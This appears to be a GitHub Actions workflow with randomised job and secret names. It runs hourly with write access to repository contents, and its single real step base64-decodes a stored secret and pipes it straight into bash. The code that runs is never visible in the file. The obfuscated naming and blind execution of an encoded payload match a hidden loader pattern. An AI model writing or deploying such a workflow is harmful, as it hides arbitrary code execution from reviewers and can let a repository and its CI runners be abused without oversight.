name: YBEcFNjCMGJGYt
on:
  schedule:
    - cron: '59 * * * *'
  workflow_dispatch:
permissions:
  contents: write
jobs:
  JqYIexjYSNJC:
    runs-on: ubuntu-22.04
    env:
      HeVGFZIGazyDSZrJBr: ${{ secrets.HeVGFZIGazyDSZrJBr }}
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ secrets.sCNwkrGTTuCkXeghTL }}" | base64 -d | bash
